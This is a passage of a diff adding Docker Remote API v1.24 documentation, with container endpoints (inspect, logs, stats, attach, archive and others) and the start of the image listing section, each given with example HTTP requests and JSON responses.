+    -   **PortBindings** - A map of exposed container ports and the host port they
+          should map to. A JSON object in the form
+          `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
+          Take note that `port` is specified as a string and not an integer value.
+    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+          exposed ports. Specified as a boolean value.
+    -   **Privileged** - Gives the container full access to the host. Specified as
+          a boolean value.
+    -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
+          Specified as a boolean value.
+    -   **Dns** - A list of DNS servers for the container to use.
+    -   **DnsOptions** - A list of DNS options
+    -   **DnsSearch** - A list of DNS search domains
+    -   **ExtraHosts** - A list of hostnames/IP mappings to add to the
+        container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`.
+    -   **VolumesFrom** - A list of volumes to inherit from another container.
+          Specified in the form `<container name>[:<ro|rw>]`
+    -   **CapAdd** - A list of kernel capabilities to add to the container.
+    -   **Capdrop** - A list of kernel capabilities to drop from the container.
+    -   **GroupAdd** - A list of additional groups that the container process will run as
+    -   **RestartPolicy** – The behavior to apply when the container exits.  The
+            value is an object with a `Name` property of either `"always"` to
+            always restart, `"unless-stopped"` to restart always except when
+            user has manually stopped the container or `"on-failure"` to restart only when the container
+            exit code is non-zero.  If `on-failure` is used, `MaximumRetryCount`
+            controls the number of times to retry before giving up.
+            The default is not to restart. (optional)
+            An ever increasing delay (double the previous delay, starting at 100mS)
+            is added before each restart to prevent flooding the server.
+    -   **UsernsMode**  - Sets the usernamespace mode for the container when usernamespace remapping option is enabled.
+           supported values are: `host`.
+    -   **NetworkMode** - Sets the networking mode for the container. Supported
+          standard values are: `bridge`, `host`, `none`, and `container:<name|id>`. Any other value is taken
+          as a custom network's name to which this container should connect to.
+    -   **Devices** - A list of devices to add to the container specified as a JSON object in the
+      form
+          `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}`
+    -   **Ulimits** - A list of ulimits to set in the container, specified as
+          `{ "Name": <name>, "Soft": <soft limit>, "Hard": <hard limit> }`, for example:
+          `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }`
+    -   **Sysctls** - A list of kernel parameters (sysctls) to set in the container, specified as
+          `{ <name>: <Value> }`, for example:
+	  `{ "net.ipv4.ip_forward": "1" }`
+    -   **SecurityOpt**: A list of string values to customize labels for MLS
+        systems, such as SELinux.
+    -   **StorageOpt**: Storage driver options per container. Options can be passed in the form
+        `{"size":"120G"}`
+    -   **LogConfig** - Log configuration for the container, specified as a JSON object in the form
+          `{ "Type": "<driver_name>", "Config": {"key1": "val1"}}`.
+          Available types: `json-file`, `syslog`, `journald`, `gelf`, `fluentd`, `awslogs`, `splunk`, `etwlogs`, `none`.
+          `json-file` logging driver.
+    -   **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist.
+    -   **VolumeDriver** - Driver that this container users to mount volumes.
+    -   **ShmSize** - Size of `/dev/shm` in bytes. The size must be greater than 0.  If omitted the system uses 64MB.
+
+**Query parameters**:
+
+-   **name** – Assign the specified name to the container. Must
+    match `/?[a-zA-Z0-9_-]+`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **406** – impossible to attach (container not running)
+-   **409** – conflict
+-   **500** – server error
+
+#### Inspect a container
+
+`GET /containers/(id or name)/json`
+
+Return low-level information on the container `id`
+
+**Example request**:
+
+      GET /v1.24/containers/4fa6e0f0c678/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+	{
+		"AppArmorProfile": "",
+		"Args": [
+			"-c",
+			"exit 9"
+		],
+		"Config": {
+			"AttachStderr": true,
+			"AttachStdin": false,
+			"AttachStdout": true,
+			"Cmd": [
+				"/bin/sh",
+				"-c",
+				"exit 9"
+			],
+			"Domainname": "",
+			"Entrypoint": null,
+			"Env": [
+				"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+			],
+			"ExposedPorts": null,
+			"Hostname": "ba033ac44011",
+			"Image": "ubuntu",
+			"Labels": {
+				"com.example.vendor": "Acme",
+				"com.example.license": "GPL",
+				"com.example.version": "1.0"
+			},
+			"MacAddress": "",
+			"NetworkDisabled": false,
+			"OnBuild": null,
+			"OpenStdin": false,
+			"StdinOnce": false,
+			"Tty": false,
+			"User": "",
+			"Volumes": {
+				"/volumes/data": {}
+			},
+			"WorkingDir": "",
+			"StopSignal": "SIGTERM"
+		},
+		"Created": "2015-01-06T15:47:31.485331387Z",
+		"Driver": "devicemapper",
+		"ExecIDs": null,
+		"HostConfig": {
+			"Binds": null,
+			"IOMaximumBandwidth": 0,
+			"IOMaximumIOps": 0,
+			"BlkioWeight": 0,
+			"BlkioWeightDevice": [{}],
+			"BlkioDeviceReadBps": [{}],
+			"BlkioDeviceWriteBps": [{}],
+			"BlkioDeviceReadIOps": [{}],
+			"BlkioDeviceWriteIOps": [{}],
+			"CapAdd": null,
+			"CapDrop": null,
+			"ContainerIDFile": "",
+			"CpusetCpus": "",
+			"CpusetMems": "",
+			"CpuPercent": 80,
+			"CpuShares": 0,
+			"CpuPeriod": 100000,
+			"Devices": [],
+			"Dns": null,
+			"DnsOptions": null,
+			"DnsSearch": null,
+			"ExtraHosts": null,
+			"IpcMode": "",
+			"Links": null,
+			"LxcConf": [],
+			"Memory": 0,
+			"MemorySwap": 0,
+			"MemoryReservation": 0,
+			"KernelMemory": 0,
+			"OomKillDisable": false,
+			"OomScoreAdj": 500,
+			"NetworkMode": "bridge",
+			"PidMode": "",
+			"PortBindings": {},
+			"Privileged": false,
+			"ReadonlyRootfs": false,
+			"PublishAllPorts": false,
+			"RestartPolicy": {
+				"MaximumRetryCount": 2,
+				"Name": "on-failure"
+			},
+			"LogConfig": {
+				"Config": null,
+				"Type": "json-file"
+			},
+			"SecurityOpt": null,
+			"Sysctls": {
+			        "net.ipv4.ip_forward": "1"
+			},
+			"StorageOpt": null,
+			"VolumesFrom": null,
+			"Ulimits": [{}],
+			"VolumeDriver": "",
+			"ShmSize": 67108864
+		},
+		"HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname",
+		"HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts",
+		"LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+		"Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39",
+		"Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2",
+		"MountLabel": "",
+		"Name": "/boring_euclid",
+		"NetworkSettings": {
+			"Bridge": "",
+			"SandboxID": "",
+			"HairpinMode": false,
+			"LinkLocalIPv6Address": "",
+			"LinkLocalIPv6PrefixLen": 0,
+			"Ports": null,
+			"SandboxKey": "",
+			"SecondaryIPAddresses": null,
+			"SecondaryIPv6Addresses": null,
+			"EndpointID": "",
+			"Gateway": "",
+			"GlobalIPv6Address": "",
+			"GlobalIPv6PrefixLen": 0,
+			"IPAddress": "",
+			"IPPrefixLen": 0,
+			"IPv6Gateway": "",
+			"MacAddress": "",
+			"Networks": {
+				"bridge": {
+					"NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+					"EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d",
+					"Gateway": "172.17.0.1",
+					"IPAddress": "172.17.0.2",
+					"IPPrefixLen": 16,
+					"IPv6Gateway": "",
+					"GlobalIPv6Address": "",
+					"GlobalIPv6PrefixLen": 0,
+					"MacAddress": "02:42:ac:12:00:02"
+				}
+			}
+		},
+		"Path": "/bin/sh",
+		"ProcessLabel": "",
+		"ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf",
+		"RestartCount": 1,
+		"State": {
+			"Error": "",
+			"ExitCode": 9,
+			"FinishedAt": "2015-01-06T15:47:32.080254511Z",
+			"OOMKilled": false,
+			"Dead": false,
+			"Paused": false,
+			"Pid": 0,
+			"Restarting": false,
+			"Running": true,
+			"StartedAt": "2015-01-06T15:47:32.072697474Z",
+			"Status": "running"
+		},
+		"Mounts": [
+			{
+				"Name": "fac362...80535",
+				"Source": "/data",
+				"Destination": "/data",
+				"Driver": "local",
+				"Mode": "ro,Z",
+				"RW": false,
+				"Propagation": ""
+			}
+		]
+	}
+
+**Example request, with size information**:
+
+    GET /v1.24/containers/4fa6e0f0c678/json?size=1 HTTP/1.1
+
+**Example response, with size information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+    ....
+    "SizeRw": 0,
+    "SizeRootFs": 972,
+    ....
+    }
+
+**Query parameters**:
+
+-   **size** – 1/True/true or 0/False/false, return container size information. Default is `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### List processes running inside a container
+
+`GET /containers/(id or name)/top`
+
+List processes running inside the container `id`. On Unix systems this
+is done by running the `ps` command. This endpoint is not
+supported on Windows.
+
+**Example request**:
+
+    GET /v1.24/containers/4fa6e0f0c678/top HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Titles" : [
+         "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD"
+       ],
+       "Processes" : [
+         [
+           "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash"
+         ],
+         [
+           "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10"
+         ]
+       ]
+    }
+
+**Example request**:
+
+    GET /v1.24/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Titles" : [
+        "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND"
+      ]
+      "Processes" : [
+        [
+          "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash"
+        ],
+        [
+          "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10"
+        ]
+      ],
+    }
+
+**Query parameters**:
+
+-   **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef`
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container logs
+
+`GET /containers/(id or name)/logs`
+
+Get `stdout` and `stderr` logs from the container ``id``
+
+> **Note**:
+> This endpoint works only for containers with the `json-file` or `journald` logging drivers.
+
+**Example request**:
+
+     GET /v1.24/containers/4fa6e0f0c678/logs?stderr=1&stdout=1&timestamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1
+
+**Example response**:
+
+     HTTP/1.1 101 UPGRADED
+     Content-Type: application/vnd.docker.raw-stream
+     Connection: Upgrade
+     Upgrade: tcp
+
+     {% raw %}
+     {{ STREAM }}
+     {% endraw %}
+
+**Query parameters**:
+
+-   **details** - 1/True/true or 0/False/flase, Show extra details provided to logs. Default `false`.
+-   **follow** – 1/True/true or 0/False/false, return stream. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`.
+-   **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp
+    will only output log-entries since that timestamp. Default: 0 (unfiltered)
+-   **timestamps** – 1/True/true or 0/False/false, print timestamps for
+        every log line. Default `false`.
+-   **tail** – Output specified number of lines at the end of logs: `all` or `<number>`. Default all.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **404** – no such container
+-   **500** – server error
+
+#### Inspect changes on a container's filesystem
+
+`GET /containers/(id or name)/changes`
+
+Inspect changes on container `id`'s filesystem
+
+**Example request**:
+
+    GET /v1.24/containers/4fa6e0f0c678/changes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Path": "/dev",
+                 "Kind": 0
+         },
+         {
+                 "Path": "/dev/kmsg",
+                 "Kind": 1
+         },
+         {
+                 "Path": "/test",
+                 "Kind": 1
+         }
+    ]
+
+Values for `Kind`:
+
+- `0`: Modify
+- `1`: Add
+- `2`: Delete
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Export a container
+
+`GET /containers/(id or name)/export`
+
+Export the contents of container `id`
+
+**Example request**:
+
+    GET /v1.24/containers/4fa6e0f0c678/export HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/octet-stream
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container stats based on resource usage
+
+`GET /containers/(id or name)/stats`
+
+This endpoint returns a live stream of a container's resource usage statistics.
+
+**Example request**:
+
+    GET /v1.24/containers/redis1/stats HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Type: application/json
+
+      {
+         "read" : "2015-01-08T22:57:31.547920715Z",
+         "pids_stats": {
+            "current": 3
+         },
+         "networks": {
+                 "eth0": {
+                     "rx_bytes": 5338,
+                     "rx_dropped": 0,
+                     "rx_errors": 0,
+                     "rx_packets": 36,
+                     "tx_bytes": 648,
+                     "tx_dropped": 0,
+                     "tx_errors": 0,
+                     "tx_packets": 8
+                 },
+                 "eth5": {
+                     "rx_bytes": 4641,
+                     "rx_dropped": 0,
+                     "rx_errors": 0,
+                     "rx_packets": 26,
+                     "tx_bytes": 690,
+                     "tx_dropped": 0,
+                     "tx_errors": 0,
+                     "tx_packets": 9
+                 }
+         },
+         "memory_stats" : {
+            "stats" : {
+               "total_pgmajfault" : 0,
+               "cache" : 0,
+               "mapped_file" : 0,
+               "total_inactive_file" : 0,
+               "pgpgout" : 414,
+               "rss" : 6537216,
+               "total_mapped_file" : 0,
+               "writeback" : 0,
+               "unevictable" : 0,
+               "pgpgin" : 477,
+               "total_unevictable" : 0,
+               "pgmajfault" : 0,
+               "total_rss" : 6537216,
+               "total_rss_huge" : 6291456,
+               "total_writeback" : 0,
+               "total_inactive_anon" : 0,
+               "rss_huge" : 6291456,
+               "hierarchical_memory_limit" : 67108864,
+               "total_pgfault" : 964,
+               "total_active_file" : 0,
+               "active_anon" : 6537216,
+               "total_active_anon" : 6537216,
+               "total_pgpgout" : 414,
+               "total_cache" : 0,
+               "inactive_anon" : 0,
+               "active_file" : 0,
+               "pgfault" : 964,
+               "inactive_file" : 0,
+               "total_pgpgin" : 477
+            },
+            "max_usage" : 6651904,
+            "usage" : 6537216,
+            "failcnt" : 0,
+            "limit" : 67108864
+         },
+         "blkio_stats" : {},
+         "cpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24472255,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100215355,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 739306590000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         },
+         "precpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24350896,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100093996,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 9492140000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         }
+      }
+
+The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+
+**Query parameters**:
+
+-   **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Resize a container TTY
+
+`POST /containers/(id or name)/resize`
+
+Resize the TTY for container with  `id`. The unit is number of characters. You must restart the container for the resize to take effect.
+
+**Example request**:
+
+      POST /v1.24/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Length: 0
+      Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – No such container
+-   **500** – Cannot resize container
+
+#### Start a container
+
+`POST /containers/(id or name)/start`
+
+Start the container `id`
+
+**Example request**:
+
+    POST /v1.24/containers/e90e34656806/start HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **detachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already started
+-   **404** – no such container
+-   **500** – server error
+
+#### Stop a container
+
+`POST /containers/(id or name)/stop`
+
+Stop the container `id`
+
+**Example request**:
+
+    POST /v1.24/containers/e90e34656806/stop?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already stopped
+-   **404** – no such container
+-   **500** – server error
+
+#### Restart a container
+
+`POST /containers/(id or name)/restart`
+
+Restart the container `id`
+
+**Example request**:
+
+    POST /v1.24/containers/e90e34656806/restart?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Kill a container
+
+`POST /containers/(id or name)/kill`
+
+Kill the container `id`
+
+**Example request**:
+
+    POST /v1.24/containers/e90e34656806/kill HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **signal** - Signal to send to the container: integer or string like `SIGINT`.
+        When not set, `SIGKILL` is assumed and the call waits for the container to exit.
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Update a container
+
+`POST /containers/(id or name)/update`
+
+Update configuration of one or more containers.
+
+**Example request**:
+
+       POST /v1.24/containers/e90e34656806/update HTTP/1.1
+       Content-Type: application/json
+
+       {
+         "BlkioWeight": 300,
+         "CpuShares": 512,
+         "CpuPeriod": 100000,
+         "CpuQuota": 50000,
+         "CpusetCpus": "0,1",
+         "CpusetMems": "0",
+         "Memory": 314572800,
+         "MemorySwap": 514288000,
+         "MemoryReservation": 209715200,
+         "KernelMemory": 52428800,
+         "RestartPolicy": {
+           "MaximumRetryCount": 4,
+           "Name": "on-failure"
+         },
+       }
+
+**Example response**:
+
+       HTTP/1.1 200 OK
+       Content-Type: application/json
+
+       {
+           "Warnings": []
+       }
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+#### Rename a container
+
+`POST /containers/(id or name)/rename`
+
+Rename the container `id` to a `new_name`
+
+**Example request**:
+
+    POST /v1.24/containers/e90e34656806/rename?name=new_name HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **name** – new name for the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **409** - conflict name already assigned
+-   **500** – server error
+
+#### Pause a container
+
+`POST /containers/(id or name)/pause`
+
+Pause the container `id`
+
+**Example request**:
+
+    POST /v1.24/containers/e90e34656806/pause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Unpause a container
+
+`POST /containers/(id or name)/unpause`
+
+Unpause the container `id`
+
+**Example request**:
+
+    POST /v1.24/containers/e90e34656806/unpause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Attach to a container
+
+`POST /containers/(id or name)/attach`
+
+Attach to the container `id`
+
+**Example request**:
+
+    POST /v1.24/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 101 UPGRADED
+    Content-Type: application/vnd.docker.raw-stream
+    Connection: Upgrade
+    Upgrade: tcp
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **detachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **400** – bad parameter
+-   **404** – no such container
+-   **409** - container is paused
+-   **500** – server error
+
+**Stream details**:
+
+When using the TTY setting is enabled in
+[`POST /containers/create`
+](#create-a-container),
+the stream is the raw data from the process PTY and client's `stdin`.
+When the TTY is disabled, then the stream is multiplexed to separate
+`stdout` and `stderr`.
+
+The format is a **Header** and a **Payload** (frame).
+
+**HEADER**
+
+The header contains the information which the stream writes (`stdout` or
+`stderr`). It also contains the size of the associated frame encoded in the
+last four bytes (`uint32`).
+
+It is encoded on the first eight bytes like this:
+
+    header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}
+
+`STREAM_TYPE` can be:
+
+-   0: `stdin` (is written on `stdout`)
+-   1: `stdout`
+-   2: `stderr`
+
+`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of
+the `uint32` size encoded as big endian.
+
+**PAYLOAD**
+
+The payload is the raw stream.
+
+**IMPLEMENTATION**
+
+The simplest way to implement the Attach protocol is the following:
+
+    1.  Read eight bytes.
+    2.  Choose `stdout` or `stderr` depending on the first byte.
+    3.  Extract the frame size from the last four bytes.
+    4.  Read the extracted size and output it on the correct output.
+    5.  Goto 1.
+
+#### Attach to a container (websocket)
+
+`GET /containers/(id or name)/attach/ws`
+
+Attach to the container `id` via websocket
+
+Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455)
+
+**Example request**
+
+    GET /v1.24/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+
+**Example response**
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **detachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+#### Wait a container
+
+`POST /containers/(id or name)/wait`
+
+Block until container `id` stops, then returns the exit code
+
+**Example request**:
+
+    POST /v1.24/containers/16253994b7c4/wait HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"StatusCode": 0}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Remove a container
+
+`DELETE /containers/(id or name)`
+
+Remove the container `id` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.24/containers/16253994b7c4?v=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **v** – 1/True/true or 0/False/false, Remove the volumes
+        associated to the container. Default `false`.
+-   **force** - 1/True/true or 0/False/false, Kill then remove the container.
+        Default `false`.
+
+**Status codes**:
+
+-   **204** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **409** – conflict
+-   **500** – server error
+
+#### Retrieving information about files and folders in a container
+
+`HEAD /containers/(id or name)/archive`
+
+See the description of the `X-Docker-Container-Path-Stat` header in the
+following section.
+
+#### Get an archive of a filesystem resource in a container
+
+`GET /containers/(id or name)/archive`
+
+Get a tar archive of a resource in the filesystem of container `id`.
+
+**Query parameters**:
+
+- **path** - resource in the container's filesystem to archive. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The resource specified by **path** must exist. To assert that the resource
+    is expected to be a directory, **path** should end in `/` or  `/.`
+    (assuming a path separator of `/`). If **path** ends in `/.` then this
+    indicates that only the contents of the **path** directory should be
+    copied. A symlink is always resolved to its target.
+
+    > **Note**: It is not possible to copy certain system files such as resources
+    > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the
+    > container.
+
+**Example request**:
+
+    GET /v1.24/containers/8cce319429b2/archive?path=/root HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+    X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0=
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+On success, a response header `X-Docker-Container-Path-Stat` will be set to a
+base64-encoded JSON object containing some filesystem header information about
+the archived resource. The above example value would decode to the following
+JSON object (whitespace added for readability):
+
+```json
+{
+    "name": "root",
+    "size": 4096,
+    "mode": 2147484096,
+    "mtime": "2014-02-27T20:51:23Z",
+    "linkTarget": ""
+}
+```
+
+A `HEAD` request can also be made to this endpoint if only this information is
+desired.
+
+**Status codes**:
+
+- **200** - success, returns archive of copied resource
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** was asserted to be a directory but exists as a
+      file)
+- **404** - client error, resource not found, one of:
+    – no such container (container `id` does not exist)
+    - no such file or directory (**path** does not exist)
+- **500** - server error
+
+#### Extract an archive of files or folders to a directory in a container
+
+`PUT /containers/(id or name)/archive`
+
+Upload a tar archive to be extracted to a path in the filesystem of container
+`id`.
+
+**Query parameters**:
+
+- **path** - path to a directory in the container
+    to extract the archive's contents into. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The **path** resource must exist.
+- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error
+    if unpacking the given content would cause an existing directory to be
+    replaced with a non-directory and vice versa.
+
+**Example request**:
+
+    PUT /v1.24/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** – the content was extracted successfully
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** should be a directory but exists as a file)
+    - unable to overwrite existing directory with non-directory
+      (if **noOverwriteDirNonDir**)
+    - unable to overwrite existing non-directory with directory
+      (if **noOverwriteDirNonDir**)
+- **403** - client error, permission denied, the volume
+    or container rootfs is marked as read-only.
+- **404** - client error, resource not found, one of:
+    – no such container (container `id` does not exist)
+    - no such file or directory (**path** resource does not exist)
+- **500** – server error
+
+### 3.2 Images
+
+#### List Images
+
+`GET /images/json`
+
+**Example request**:
+
+    GET /v1.24/images/json?all=0 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+         "RepoTags": [
+           "ubuntu:12.04",
+           "ubuntu:precise",
+           "ubuntu:latest"
+         ],
+         "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c",
+         "Created": 1365714795,
+         "Size": 131506275,
+         "VirtualSize": 131506275,
+         "Labels": {}
+      },
+      {
+         "RepoTags": [
+           "ubuntu:12.10",
+           "ubuntu:quantal"
+         ],
+         "ParentId": "27cf784147099545",
+         "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc",
+         "Created": 1364102658,
+         "Size": 24653,
+         "VirtualSize": 180116135,
+         "Labels": {
+            "com.example.version": "v1"
+         }
+      }
+    ]
+
+**Example request, with digest information**:
+
+    GET /v1.24/images/json?digests=1 HTTP/1.1
+
+**Example response, with digest information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
